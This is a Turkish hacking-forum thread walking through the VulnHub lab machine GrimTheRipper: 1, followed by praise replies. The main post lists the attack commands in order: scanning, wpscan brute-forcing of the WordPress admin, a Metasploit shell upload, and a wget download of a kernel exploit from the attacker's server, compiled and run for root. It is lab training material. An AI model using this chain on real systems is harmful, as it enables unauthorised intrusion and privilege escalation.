THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

GrimTheRipper: 1 Zafiyetli Makine Çözümü//"P4RS

P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
15
2332
16-12-2019 22:48
#1
Merhabalar TürkHackTeam ailesi, bugün sizlere "GrimTheRipper: 1 Zafiyetli Makinesinin Çözümünü" göstereceğim.



https://www.vulnhub.com/entry/grimtheripper-1,350/



Makine İsmi: GrimTheRipper: 1

Yayınlanma Tarihi: 20 Ağustos 2019

Yapımcı: Manish Chandra

Seri: GrimTheRipper

Açıklama: Hedefte Root yetkisine erişmek

Dosya Boyutu: 1.5 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Orta




İlk öncelikle hedefin IP adresini almamız lazım bunun için de
Kod:
sudo netdiscover
yazalım.



Hedefin IP adresini öğrendik.



NMAP taraması yaparak açık portlar hakkında bilgi sahibi olacağız. Bunun için
Kod:
nmap -A IP_ADRESİ
olarak yazalım. 22 ve 80 portlarının açık olduğunu gördük



Tarayıcımızı açalım ve IP adresini arayalım. Sitede herhangi bir şey bulamadık.



Siteyi kazımak için dirb aracını kullanacağız. Terminale
Kod:
dirb http://IP_adresi
yazalım.

robots.txt dosyasını ve index dosyalarını buldu bir bakalım.



Bizleri index2 kısmına yönlendiriyor.



İndex2 de ise bir görsel bizleri karşıladı.



Kaynak kodlarına bakayım dedim ve bir base64 şifresi karşıma çıktı



Bunu
Kod:
echo THpFd0f1UQXhNREU9IHRyeSBoYXJk | base64 -d
yazdım ve bir şifre daha verdi. Daha sonra bunu tekrar
Kod:
echo 'LzEwMTAxMDE=' | base64 -d
yazdığımda bana /1010101 verisini verdi.



Sitede IP_ADRESİ/1010101 olarak yazdığımda bir /wordpress olduğunu gördüm.



Wordpress görüntüsü bu şekildedir



Wpscan ile kullanıcı verilerini listelemek için
Kod:
wpscan --url http://IP_adresi/1010101/wordpress/ -e u
yazalım.



Kullanıcının admin olduğunu gördük.



Brute saldırı için rockyou.txt dosyasını kullanacağım. Terminale
Kod:
wpscan wpscan --url http://IP_adresi/1010101/wordpress/ -U admin -P rockyou.txt dosyasının uzantısı


Şifrenin [email protected] olduğunu öğrendik.



Ardından wp-admin-shell-upload exploitini kullanmak için msfconsole'a giriyoruz.
Kod:
msfconsole
yazalım.



Terminale
Kod:
search webapp
yazalım.



Burada 105. sıradakini kullanacağız.



Kullanmak için
Kod:
use 105
yazalım ve ayarlarını görmek için
Kod:
show options
yazalım.



Ayarlamamız gereken bazı ayarlar var bunları da
Kod:
set RHOSTS IP_ADRES 
set TARGETURI /1010101/wordpress/
set USERNAME admin
set PASSWORD [email protected]
exploti
yazarak giriş yapalım.



Kabuğa erişmek için ilk öncelikle
Kod:
shell
yazalım ardından da kabuğa erişim için
Kod:
python -c 'import pty;pty.spawn("/bin/bash")'
yazalım ve kabuğa erişelim. Ardından Linux bilgilerini almak için
Kod:
lsb_release -a
yazarak Linux bilgilerini aldık.



Ardından searchsploit ile kernel exploiti aramaya koyuldum. Terminale
Kod:
searchsploit Ubuntu 12.04
yazdım ve kırmızı işaretle aldığım kısmında ki dosyayı almak için
Kod:
searchsploit -m 37292.c
yazdım. Ardından ağı açarak hedef makineden dosyayı indirmek için
Kod:
python -m SimpelHTTPServer
yazdım.



Ardından exploit ile giriş yaptığımız terminale gelerek
Kod:
cd /tmp
wget IP_adresi:8000/37292.c
yazarak dosyayı makineye indirdik.



Ardından dosyayı shell dosyasına çevirmek için
Kod:
gcc 37292.c -o shell
yazdık ve dosyaya tam yetki vermek için
Kod:
chmod 777 shell
yazdık. Ardından shell dosyasını çalıştırmak için
Kod:
./shell
yazalım. Shell dosyası çalıştı peki hangi kullanıcıdayız? id yazalım ve root yetkisinde olduğumuzu görelim.





Konum bu kadardı arkadaşlar, başka bir konuda görüşmek üzere sağlıcakla..

---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Konu P4RS tarafından (16-12-2019 23:04 Saat 23:04 ) değiştirilmiştir.
PourLa - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
03/2016
Nereden:
Mesajlar:
1.668
Konular:
310
Teşekkür (Etti):
630
Teşekkür (Aldı):
872
Ticaret:
(0) %
16-12-2019 23:00
#2
Ellerin dert görmesin hocam ellerine sağlık
---------------------
PourLa
Html/Css > Python > C ve C++
( }-----{ TÜRK HACK TEAM }-----{ )
Twitter | Telegram | İnstagram
By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
24
Mesajlar:
939
Konular:
144
Teşekkür (Etti):
400
Teşekkür (Aldı):
457
Ticaret:
(0) %
16-12-2019 23:26
#3
Elinize sağlık hocam wp reverse shell kısmına kadar kolay gözükse de yetki yükseltme de kernel exploit olayı biraz zorlayıcı duruyor onunda kullanımı görmek güzel olmuş
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
Bugs Bunny - ait Kullanıcı Resmi (Avatar)
Senior Hunter
Üyelik tarihi:
07/2016
Nereden:
MSFVenom
Mesajlar:
1.477
Konular:
115
Teşekkür (Etti):
28
Teşekkür (Aldı):
710
Ticaret:
(0) %
16-12-2019 23:27
#4
Ellerine Sağlık P4RS , Yine Mükemmel Olmuş.
---------------------
"Ölüm, insanın değişmez kaderidir; marifet unutulmamaktır.".

ratio - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
07/2013
Nereden:
Turk
Mesajlar:
2.462
Konular:
106
Teşekkür (Etti):
247
Teşekkür (Aldı):
890
Ticaret:
(0) %
17-12-2019 00:56
#5
Elinize sağlık hocam.


Alıntı:
By Ghost´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam wp reverse shell kısmına kadar kolay gözükse de yetki yükseltme de kernel exploit olayı biraz zorlayıcı duruyor onunda kullanımı görmek güzel olmuş

Aynen "By Ghost"a katılıyorum. Bahsettiğimden biraz farklıymış. Ama detaylı ve güzel anlatmışsınız. Tekrardan elinize sağlık.
---------------------
Copyright decrypted

The Golden Ratio is a special number found by dividing a line into two parts so that the longer part divided by smaller part is also equal to the whole length divided by the longer part.
AhmetKaan46 - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
02/2019
Nereden:
Yaş:
27
Mesajlar:
1.409
Konular:
138
Teşekkür (Etti):
747
Teşekkür (Aldı):
468
Ticaret:
(0) %
17-12-2019 01:17
#6
Eline sağlık hocam devamını bekliyorum zafitet çözümlerinin
Rumexus - ait Kullanıcı Resmi (Avatar)
Uzman Üye
Üyelik tarihi:
01/2016
Nereden:
7
Mesajlar:
1.823
Konular:
113
Teşekkür (Etti):
1065
Teşekkür (Aldı):
825
Ticaret:
(0) %
17-12-2019 01:22
#7
Elinize sağlık hocam mükemmel bir konu çok yararlı, kendini bu alanda geliştirecek arkadaşlar için.
---------------------
Acizler için imkansız, korkaklar için inanılmaz gözüken şeyler kahramanlar için idealdir.
stayhigh - ait Kullanıcı Resmi (Avatar)
Katılımcı Üye
Üyelik tarihi:
09/2019
Nereden:
Mars
Mesajlar:
641
Konular:
152
Teşekkür (Etti):
399
Teşekkür (Aldı):
743
Ticaret:
(0) %
17-12-2019 01:51
#8
Hocam ellerinize sağlık
CrazyExelans - ait Kullanıcı Resmi (Avatar)
Katılımcı Üye
Üyelik tarihi:
08/2017
Nereden:
Burning Hâll
Mesajlar:
923
Konular:
41
Teşekkür (Etti):
10
Teşekkür (Aldı):
561
Ticaret:
(0) %
17-12-2019 13:08
#9
Emeğine sağlık.
---------------------
Kod:
,
,    -------                                                  --------------
,      The Ordinaryus, Father of White's, Prof. Doç. Dr. Sn. Abuzer Kömürcü Exelansları  R.I.P
,    -------                                                  --------------
,
MyKrallife - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
11/2015
Nereden:
/profile.php
Mesajlar:
2.864
Konular:
275
Teşekkür (Etti):
591
Teşekkür (Aldı):
1769
Ticaret:
(0) %
17-12-2019 15:26
#10
Elinize sağlık hocam az uğraşmadım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler